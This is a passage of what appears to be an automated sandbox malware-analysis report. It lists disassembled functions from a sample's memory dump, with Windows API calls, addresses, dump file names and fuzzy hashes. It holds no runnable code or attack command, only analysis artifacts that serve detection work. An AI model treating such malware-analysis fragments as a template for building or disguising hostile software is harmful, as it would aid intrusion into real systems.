                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0015CA86
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015CAB8
                                                                                                                                                          • __itow.LIBCMT ref: 0015CAD0
                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0015CAF6
                                                                                                                                                          • __itow.LIBCMT ref: 0015CB07
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$__itow$_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2983881199-0
                                                                                                                                                          • Opcode ID: a30eab1c1de2ffb0b5141679bbece65de184f576b040ef8ecf7b27ab096bfe1a
                                                                                                                                                          • Instruction ID: a507dc9274d9466e10dc31b646913f17c804f9ea20844c94dd4f7b0fe0501d4c
                                                                                                                                                          • Opcode Fuzzy Hash: a30eab1c1de2ffb0b5141679bbece65de184f576b040ef8ecf7b27ab096bfe1a
                                                                                                                                                          • Instruction Fuzzy Hash: 0721F632700714BFDB24EE649C47EDE7A69AF5AB51F000025FD15EB181E7708D4987E0
                                                                                                                                                          Function 001789AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(00000000), ref: 001789CE
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 001789E5
                                                                                                                                                          • GetDC.USER32(00000000), ref: 00178A21
                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00178A2D
                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00178A68
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                          • Opcode ID: 32574108e1008782819b3f82728187eb5df7d0e8c76b27db40c3aca4b11f408b
                                                                                                                                                          • Instruction ID: b00650fac5812c3ae8478201c926b46b170d022947d5e377fab3ba7801fe6487
                                                                                                                                                          • Opcode Fuzzy Hash: 32574108e1008782819b3f82728187eb5df7d0e8c76b27db40c3aca4b11f408b
                                                                                                                                                          • Instruction Fuzzy Hash: 7521A176A00214AFDB04EFA5DC89AAA7BF5EF49304F04C478E94AD7751DB70AD40CB90
                                                                                                                                                          Function 0013B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013B5EB
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0013B5FA
                                                                                                                                                          • BeginPath.GDI32(?), ref: 0013B611
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0013B63B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                          • Opcode ID: 139a933b1f4be8977d042ccc360b559982361e1bd9fcaf29295bd02cc192391e
                                                                                                                                                          • Instruction ID: 752f8b8b85ad7a1c8dd3e75074e6bea4bfdcb922455e388bb48e5708eee55e74
                                                                                                                                                          • Opcode Fuzzy Hash: 139a933b1f4be8977d042ccc360b559982361e1bd9fcaf29295bd02cc192391e
                                                                                                                                                          • Instruction Fuzzy Hash: 8521BEB0904788FBCB109F95ECC9BAD7BE9FB01325F14011AF5119A8A1E37088D1CF91
                                                                                                                                                          Function 00142E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 00142E81
                                                                                                                                                          • CreateThread.KERNEL32(?,?,00142FB7,00000000,?,?), ref: 00142EC5
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00142ECF
                                                                                                                                                          • _free.LIBCMT ref: 00142ED8
                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00142EE3
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2664167353-0
                                                                                                                                                          • Opcode ID: 62460eee9e3e3f0a21658c7d1847a8f832dbbe4a0da41a7e54eb72a89be51e5a
                                                                                                                                                          • Instruction ID: 8e0952c4a9c63ccce2416737257815946c53b34f1537e3793a1f4a48930b7f1b
                                                                                                                                                          • Opcode Fuzzy Hash: 62460eee9e3e3f0a21658c7d1847a8f832dbbe4a0da41a7e54eb72a89be51e5a
                                                                                                                                                          • Instruction Fuzzy Hash: 9111C432104706AFDB20BFA5AC41DAF7BA8EF55770B500429FA14961B1EB31C8818760
                                                                                                                                                          Function 0015B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015B903
                                                                                                                                                          • GetLastError.KERNEL32(?,0015B3CB,?,?,?), ref: 0015B90D
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,0015B3CB,?,?,?), ref: 0015B91C
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,0015B3CB), ref: 0015B923
                                                                                                                                                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015B93A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 883493501-0
                                                                                                                                                          • Opcode ID: 687728b279047a004d787db90daccd2f0d7155779eb1598a88a7c9222a00457f
                                                                                                                                                          • Instruction ID: e08ad7d4fbe3edc06567e9a1d570c6486269b298ca7848eabe7a034a9e0a7e21
                                                                                                                                                          • Opcode Fuzzy Hash: 687728b279047a004d787db90daccd2f0d7155779eb1598a88a7c9222a00457f
                                                                                                                                                          • Instruction Fuzzy Hash: D8016DB5201204BFDF114FA5EC88DAB3BADFF8A769B140029F946C6550DB758C84DA60
                                                                                                                                                          Function 00168355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00168371
                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0016837F
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00168387
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00168391
                                                                                                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001683CD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                          • Opcode ID: 460e73e31150901044785d49e2b74a3615d4b003e1c05603d12bf5481e7596ad
                                                                                                                                                          • Instruction ID: 694108a1f2cdbc708803fa20cbfaff1f243d0bac077816dc237d2d1ede522966
                                                                                                                                                          • Opcode Fuzzy Hash: 460e73e31150901044785d49e2b74a3615d4b003e1c05603d12bf5481e7596ad
                                                                                                                                                          • Instruction Fuzzy Hash: 3B014C75D01A29DBCF00AFA5ED48AEEBB78FF09B01F010156E542B2650DF7095A0CBA2
                                                                                                                                                          Function 0015A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CLSIDFromProgID.COMBASE ref: 0015A874
                                                                                                                                                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0015A88F
                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000), ref: 0015A89D
                                                                                                                                                          • CoTaskMemFree.COMBASE(00000000), ref: 0015A8AD
                                                                                                                                                          • CLSIDFromString.COMBASE(?,?), ref: 0015A8B9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                          • Opcode ID: 9e8916bb104ffa72b6859e981146570ee4217f93bc0f96c1e6e4c44e69bd1965
                                                                                                                                                          • Instruction ID: 5715ae5b17f07c42684ccc32c1081321676e19ddccc49587e615a575d08dcef8
                                                                                                                                                          • Opcode Fuzzy Hash: 9e8916bb104ffa72b6859e981146570ee4217f93bc0f96c1e6e4c44e69bd1965
                                                                                                                                                          • Instruction Fuzzy Hash: F6018F76600604EFDB104F64EC44B9A7BEDEF45763F104124FD02DA610D774DD858BA1
                                                                                                                                                          Function 0015B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0015B7A5
                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0015B7AF
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0015B7BE
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0015B7C5
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0015B7DB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 47921759-0
                                                                                                                                                          • Opcode ID: 2b891756ea8dd403fe78a3bc7c78a59fb7a502192512ab4c5aa0729cc75fae7d
                                                                                                                                                          • Instruction ID: 5e215da1505326b55db484a7a59c7b308151b1d2929ba43d9587a53e01275e00
                                                                                                                                                          • Opcode Fuzzy Hash: 2b891756ea8dd403fe78a3bc7c78a59fb7a502192512ab4c5aa0729cc75fae7d
                                                                                                                                                          • Instruction Fuzzy Hash: E0F04F71240604AFEB101FA5ACC9EB73BACFF8A756F104019F952CB990DB609C858A60
                                                                                                                                                          Function 0015B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0015B806
                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0015B810
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015B81F
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0015B826
                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0015B83C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 47921759-0
                                                                                                                                                          • Opcode ID: a4eead2959213519a3719486ad6aafaa6345615538a7d6754dd1f36667f84ee7
                                                                                                                                                          • Instruction ID: 7cb62e5e57ac85ec8d17cfb02d0e00cbe4c69ded412a4e272d6f8108f8f7ad4f
                                                                                                                                                          • Opcode Fuzzy Hash: a4eead2959213519a3719486ad6aafaa6345615538a7d6754dd1f36667f84ee7
                                                                                                                                                          • Instruction Fuzzy Hash: A6F04F75200604AFEB211FA5FCC8EA73B6CFF46759F000029F952CB950CB649885CA60
                                                                                                                                                          Function 0015FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0015FA8F
                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0015FAA6
                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 0015FABE
                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 0015FADA
                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0015FAF4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                          • Opcode ID: ca92eca56c1ce8abd416840a5c8d9048b003a66eb5d62de6ff09ad3397e64450
                                                                                                                                                          • Instruction ID: 6156600a38e784d8d4403a288422a8de79e168950ffacab991b018cd3455adc9
                                                                                                                                                          • Opcode Fuzzy Hash: ca92eca56c1ce8abd416840a5c8d9048b003a66eb5d62de6ff09ad3397e64450
                                                                                                                                                          • Instruction Fuzzy Hash: 1B01A930900704EBEB249F10ED4EB9677B8BF0570AF0401ADB557AA8E0DBF0A989CB51
                                                                                                                                                          Function 0013B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EndPath.GDI32(?), ref: 0013B526
                                                                                                                                                          • StrokeAndFillPath.GDI32(?,?,0019F583,00000000,?), ref: 0013B542
                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0013B555
                                                                                                                                                          • DeleteObject.GDI32 ref: 0013B568
                                                                                                                                                          • StrokePath.GDI32(?), ref: 0013B583
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
